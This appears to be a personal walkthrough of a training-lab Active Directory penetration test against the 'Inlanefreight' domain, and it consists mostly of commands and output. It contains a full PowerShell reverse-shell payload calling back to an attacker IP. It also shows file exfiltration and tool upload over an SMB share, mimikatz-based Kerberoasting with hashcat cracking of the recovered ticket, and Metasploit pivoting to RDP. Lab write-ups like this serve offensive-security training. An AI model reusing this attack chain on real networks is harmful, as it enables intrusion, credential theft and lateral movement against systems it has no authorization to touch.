<aside> 🎯
Pre engagement
/uploads with creds admin:My_W3bsH3ll_P@ssw0rd!Inlanefreight
</aside><aside> 🎯
The Foot Hold
After access http://10.129.183.47/uploads/antak.aspx we get into a advanced Web shell, so from here i prefer to take this shell into my Attack Host terminal, to do that we need a listener in my attack host, and make reverse shell from the Web shell foothold
1- listener → nc -lvnp 4444
2- Prepare the reverse connection and the best way to do that is by Base64 encode for the payload and use it in powershell
echo '$client = New-Object System.Net.Sockets.TCPClient("10.10.15.101",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}' | iconv -t UTF-16LE | base64 -w 0
##the output will be Base64 code
then in the powershell web shell ->
powershell -nop -w hidden -enc BASE64_HERE
and here we go !

</aside>
<aside> 🎯
Understanding the AD Environments with some simple enums like the is the domain name , the DC , etc
whoami -> nt authority\system
net user %username% /domain -> INLANEFREIGHT.LOCAL
PS C:\> $env:USERDOMAIN
INLANEFREIGHT
PS C:\> nltest /dclist:INLANEFREIGHT
Get list of DCs in domain 'INLANEFREIGHT' from '\\DC01'.
DC01.INLANEFREIGHT.LOCAL [PDC] [DS] Site: Default-First-Site-Name
so the Domain name is : INLANEFREIGHT.LOCAL
There’s a one DC → DC01.INLANEFREIGHT.LOCAL → 172.16.6.3
</aside>
<aside> 🎯
Enum Users & Groups
All users
net user /domain
Services accounts :
net user /domain | findstr /i "svc service sql backup”
🎯to get the usernames.txtfrom victim machine to my machine we can use something like
#in my machine
sudo impacket-smbserver share . -smb2support -username test -password test
#in victim machine
net use \\10.10.15.101\share /user:test test
cmd /c copy C:\users.txt \\10.10.15.101\share\users.txt
</aside>
<aside> 🎯
Enumeration SPNs
#General
setspn.exe -Q */*
# for specifc User
PS C:\Users\administrator.INLANEFREIGHT> setspn -Q MSSQLSvc/SQL01.inlanefreight.local:1433
now we wanna to extract the TGS from the Memory and we can do this using mimkatz so firstly we upload mimkatz from my own machine to victim machine
#on my attack machine
sudo impacket-smbserver share . -smb2support -username test -password test
#on Victim machine
net use \\10.10.15.101\share /delete
net use \\10.10.15.101\share /user:test test
cmd /c copy \\10.10.15.101\share\mimikatz.exe C:\Windows\Temp\
Now make the Kerberoasting attacks
#Extract the TGS to the Memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
#Now use mimkatz
Note!⚠️ I use mimkatz like this because there's a problems in STDOUT in terminal because the shell
PS C:\tools> cmd /c ""C:\tools\mimikatz.exe" "log C:\tools\kerberoast2.txt" "privilege::debug" "kerberos::ask /target:MSSQLSvc/SQL01.inlanefreight.local:1433 /export" "exit""
-> KiRBi to file : [email protected]~1433.kirbi
now the take the kirbi file to our linux host and try to extract the TGS
#in Linux Host
sudo impacket-smbserver share . -smb2support -username test -password test
#in victim Windows Host
net use \\10.10.15.101\share /user:test test
cmd /c copy C:\tools\[email protected]~1433.kirbi \\10.10.15.101\share\
Now we have the kirbi file on our machine, now Extrack the TGS
kirbi2john.py '[email protected]~1433.kirbi'
$krb5tgs$23$*[email protected]~1433*$258c6f14c52a727648f287a696e470ba$bbf4adcfe2308d7c0ec31857bf7a4c141d93e88060a29ca277c1d0feb6ecf30c32eca898cd6b33303e68b5959e12877e1d31469dde6b93b8fee45e2d9ed03ebf19720a098008dbe606ab5044cba49322e5b8d810e343966090fbd9e5e69fe2dbb6db42b2802036bce62f9f3c38738012ae6251268af5b537c8a525d23eabf567f3ee3f27fd5667d04f7da.....
and Finally Crack it
sudo hashcat -m 13100 sql01 /usr/share/wordlists/rockyou.txt.gz
The password is lucky7
The Creds is svc_sql:lucky7
</aside>
<aside> 🎯
Pivoting to make Access More easy for Internal Resources
set the Socks Proxy
use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
run
Creating Routes with AutoRoute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
After nmap and found 3389 open, so we wanna to port forwarding here
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.6.50
</aside>
<aside> 🎯
Now i can RDP using
proxychains xfreerdp /u:svc_sql /p:lucky7 /v:localhost:3300
and found user tpetty , so let’s gather more information about this user
PS C:\Users\svc_sql.INLANEFREIGHT> net user tpetty /domain
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.
User name tpetty
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/30/2022 3:14:48 AM
Password expires Never
Password changeable 3/31/2022 3:14:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/1/2026 11:59:59 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
Now check user Sessions
query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
tpetty console 1 Active none 1/1/2026 12:01 PM
>svc_sql rdp-tcp#0 2 Active . 1/1/2026 12:16 PM
</aside>